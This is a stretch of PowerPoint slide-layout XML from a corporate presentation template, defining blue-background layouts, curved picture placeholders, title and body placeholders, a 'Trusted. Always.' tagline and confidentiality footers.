                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA92ABBC-AC06-FCE0-B882-236A7AFF8565}"/>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632955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age picture on blue bg">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="006EFF"/>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20AAC03E-4C76-6CBD-71DC-41938F15616E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="16"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6758602" y="946554"/>
            <a:ext cx="5433398" cy="5911446"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 3356913 w 5433398"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 5911446"/>
              <a:gd name="connsiteX1" fmla="*/ 5233795 w 5433398"/>
              <a:gd name="connsiteY1" fmla="*/ 574205 h 5911446"/>
              <a:gd name="connsiteX2" fmla="*/ 5433398 w 5433398"/>
              <a:gd name="connsiteY2" fmla="*/ 723699 h 5911446"/>
              <a:gd name="connsiteX3" fmla="*/ 5433398 w 5433398"/>
              <a:gd name="connsiteY3" fmla="*/ 5911446 h 5911446"/>
              <a:gd name="connsiteX4" fmla="*/ 1172032 w 5433398"/>
              <a:gd name="connsiteY4" fmla="*/ 5911446 h 5911446"/>
              <a:gd name="connsiteX5" fmla="*/ 983217 w 5433398"/>
              <a:gd name="connsiteY5" fmla="*/ 5739571 h 5911446"/>
              <a:gd name="connsiteX6" fmla="*/ 0 w 5433398"/>
              <a:gd name="connsiteY6" fmla="*/ 3362163 h 5911446"/>
              <a:gd name="connsiteX7" fmla="*/ 3356913 w 5433398"/>
              <a:gd name="connsiteY7" fmla="*/ 0 h 591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3398" h="5911446">
                <a:moveTo>
                  <a:pt x="3356913" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="4052152" y="0"/>
                  <a:pt x="4698028" y="211682"/>
                  <a:pt x="5233795" y="574205"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5433398" y="723699"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5433398" y="5911446"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1172032" y="5911446"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="983217" y="5739571"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="375735" y="5131139"/>
                  <a:pt x="0" y="4290598"/>
                  <a:pt x="0" y="3362163"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="1505292"/>
                  <a:pt x="1502941" y="0"/>
                  <a:pt x="3356913" y="0"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click icon to add picture</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC32695C-12CC-9D50-49CD-466DB2C5E584}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="412219" y="1871625"/>
            <a:ext cx="5663461" cy="4688973"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" numCol="1" spcCol="457200">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rgbClr val="F5F5F5"/>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1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49FD10CF-E2CD-1929-0337-E5AE5D622F65}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="400051" y="720725"/>
            <a:ext cx="6666229" cy="568960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Title here</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Text Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30476867-B768-5040-A530-4B3920E9D6CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="404432" y="1341737"/>
            <a:ext cx="6660401" cy="337718"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="1400" cap="all" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>CLICK TO EDIT MASTER TEXT STYLES</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Google Shape;70;p1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A68EA7B3-B6C7-2BC1-1846-8AFAFBF00211}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr preferRelativeResize="0"/>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95913" y="275154"/>
            <a:ext cx="1596717" cy="228941"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32939194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age 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7822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rgbClr val="006EFF"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>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18385019-631B-61B6-4B18-B0F613B5E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844" b="12419"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6383903" y="851724"/>
            <a:ext cx="5808097" cy="6006276"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BCFFB272-5FB9-8D9F-22BE-EC18B0731697}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="404600" y="2551837"/>
            <a:ext cx="4626222" cy="1754326"/>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a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Trusted. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Always.​</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="5400" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="319249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Alternate Single Content Box Light">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D05E810B-0F32-C503-F317-1924F0B75CB9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="611579" y="-354"/>
            <a:ext cx="5484421" cy="6858354"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 4327321"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858354"/>
              <a:gd name="connsiteX1" fmla="*/ 2739634 w 4327321"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858354"/>
              <a:gd name="connsiteX2" fmla="*/ 2794069 w 4327321"/>
              <a:gd name="connsiteY2" fmla="*/ 45266 h 6858354"/>
              <a:gd name="connsiteX3" fmla="*/ 4327321 w 4327321"/>
              <a:gd name="connsiteY3" fmla="*/ 3413503 h 6858354"/>
              <a:gd name="connsiteX4" fmla="*/ 2794068 w 4327321"/>
              <a:gd name="connsiteY4" fmla="*/ 6781741 h 6858354"/>
              <a:gd name="connsiteX5" fmla="*/ 2701936 w 4327321"/>
              <a:gd name="connsiteY5" fmla="*/ 6858354 h 6858354"/>
              <a:gd name="connsiteX6" fmla="*/ 0 w 4327321"/>
              <a:gd name="connsiteY6" fmla="*/ 6858354 h 6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321" h="6858354">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2739634" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2794069" y="45266"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3733578" y="864018"/>
                  <a:pt x="4327321" y="2069423"/>
                  <a:pt x="4327321" y="3413503"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4327321" y="4757584"/>
                  <a:pt x="3733578" y="5962988"/>
                  <a:pt x="2794068" y="6781741"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2701936" y="6858354"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="68583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6EE98CD2-6ACC-7645-9444-7226599F223F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32148" y="0"/>
            <a:ext cx="6128148" cy="6858354"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 4327321"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858354"/>
              <a:gd name="connsiteX1" fmla="*/ 2739634 w 4327321"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858354"/>
              <a:gd name="connsiteX2" fmla="*/ 2794069 w 4327321"/>
              <a:gd name="connsiteY2" fmla="*/ 45266 h 6858354"/>
              <a:gd name="connsiteX3" fmla="*/ 4327321 w 4327321"/>
              <a:gd name="connsiteY3" fmla="*/ 3413503 h 6858354"/>
              <a:gd name="connsiteX4" fmla="*/ 2794068 w 4327321"/>
              <a:gd name="connsiteY4" fmla="*/ 6781741 h 6858354"/>
              <a:gd name="connsiteX5" fmla="*/ 2701936 w 4327321"/>
              <a:gd name="connsiteY5" fmla="*/ 6858354 h 6858354"/>
              <a:gd name="connsiteX6" fmla="*/ 0 w 4327321"/>
              <a:gd name="connsiteY6" fmla="*/ 6858354 h 6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321" h="6858354">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2739634" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2794069" y="45266"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3733578" y="864018"/>
                  <a:pt x="4327321" y="2069423"/>
                  <a:pt x="4327321" y="3413503"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4327321" y="4757584"/>
                  <a:pt x="3733578" y="5962988"/>
                  <a:pt x="2794068" y="6781741"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2701936" y="6858354"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="685835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ooter Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{439A5AF7-5BE5-5549-99BE-16EFF04DB138}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="755686" y="6364817"/>
            <a:ext cx="2504349"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rgbClr val="A6A6A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latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>PROPRIETARY AND CONFIDENTIAL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD66C879-8CB2-9E45-A303-953BCFB71D28}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10862099" y="6483721"/>
            <a:ext cx="596348" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:fld id="{CEFCA7A1-962C-F544-AF88-2280ABF835A5}" type="slidenum">
              <a:rPr lang="en-US" sz="1000" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:pPr algn="r"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1000">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="65000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="24" name="Group 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99071030-6218-5640-AB10-50C4FE4BECB7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10353575" y="233128"/>
            <a:ext cx="657726" cy="102152"/>
            <a:chOff x="10627895" y="507448"/>
            <a:chExt cx="657726" cy="102152"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25" name="Oval 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{35BE7248-1879-DD4E-BE75-4F91BBB9B2C6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10627895" y="507448"/>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760D25F-2417-4B48-8934-C2C3733F9F26}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="11189368" y="515469"/>
              <a:ext cx="96253" cy="941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690510F-E89A-BE4F-8ED6-DA3E0F2B7980}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6602681" y="2302940"/>
            <a:ext cx="4953804" cy="3816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oogle Shape;70;p1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B9E73A5-3E1E-F50C-D63D-79DC636FF29D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr preferRelativeResize="0"/>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95913" y="275154"/>
            <a:ext cx="1596717" cy="228941"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B7C5976-C6FE-75B5-6B18-95440E6B7D75}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="404432" y="1341737"/>
            <a:ext cx="5236347" cy="337718"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="1400" cap="all" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="bg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9A466D2-DE18-67DD-B538-5B3B1C496236}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403762" y="2302940"/>
            <a:ext cx="5118264" cy="3816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3635D967-EA3F-67D3-153E-9B53ECFE1820}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="400051" y="720725"/>
            <a:ext cx="5484421" cy="568960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Title here</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2144432736"/>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Page picture on blue bg">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="006EFF"/>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20AAC03E-4C76-6CBD-71DC-41938F15616E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="16"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6758602" y="946554"/>
            <a:ext cx="5433398" cy="5911446"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 3356913 w 5433398"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 5911446"/>
              <a:gd name="connsiteX1" fmla="*/ 5233795 w 5433398"/>
              <a:gd name="connsiteY1" fmla="*/ 574205 h 5911446"/>
              <a:gd name="connsiteX2" fmla="*/ 5433398 w 5433398"/>
              <a:gd name="connsiteY2" fmla="*/ 723699 h 5911446"/>
              <a:gd name="connsiteX3" fmla="*/ 5433398 w 5433398"/>
              <a:gd name="connsiteY3" fmla="*/ 5911446 h 5911446"/>
              <a:gd name="connsiteX4" fmla="*/ 1172032 w 5433398"/>
              <a:gd name="connsiteY4" fmla="*/ 5911446 h 5911446"/>
              <a:gd name="connsiteX5" fmla="*/ 983217 w 5433398"/>
              <a:gd name="connsiteY5" fmla="*/ 5739571 h 5911446"/>
              <a:gd name="connsiteX6" fmla="*/ 0 w 5433398"/>
              <a:gd name="connsiteY6" fmla="*/ 3362163 h 5911446"/>
              <a:gd name="connsiteX7" fmla="*/ 3356913 w 5433398"/>
              <a:gd name="connsiteY7" fmla="*/ 0 h 591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3398" h="5911446">
                <a:moveTo>
                  <a:pt x="3356913" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="4052152" y="0"/>
                  <a:pt x="4698028" y="211682"/>
                  <a:pt x="5233795" y="574205"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5433398" y="723699"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5433398" y="5911446"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1172032" y="5911446"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="983217" y="5739571"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="375735" y="5131139"/>
                  <a:pt x="0" y="4290598"/>
                  <a:pt x="0" y="3362163"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="1505292"/>
                  <a:pt x="1502941" y="0"/>
                  <a:pt x="3356913" y="0"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Click icon to add picture</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C34A483C-04EE-640A-427A-8C9F9D74E77B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11212498" y="152438"/>
            <a:ext cx="515342" cy="451246"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{875962DA-B4D5-4007-AE4D-5E4F2B68133A}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D5C0DC1-9765-7A9C-7311-2F1865AF6498}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="195499"/>
            <a:ext cx="1917576" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{3EEC86EA-D40A-4236-8325-15338871C215}" type="datetime4">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>November 12, 2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Confidential presentation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text Placeholder 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DBD84734-863E-71F7-B960-0E93BE63CA49}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381740" y="1871625"/>
            <a:ext cx="5848238" cy="4688973"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" numCol="1" spcCol="4572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5AFD2577-18D1-561F-BC29-8F2DBFF29D6C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="380390" y="1091531"/>
            <a:ext cx="6904665" cy="780095"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Title here</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Google Shape;70;p1">
            <a:extLst>
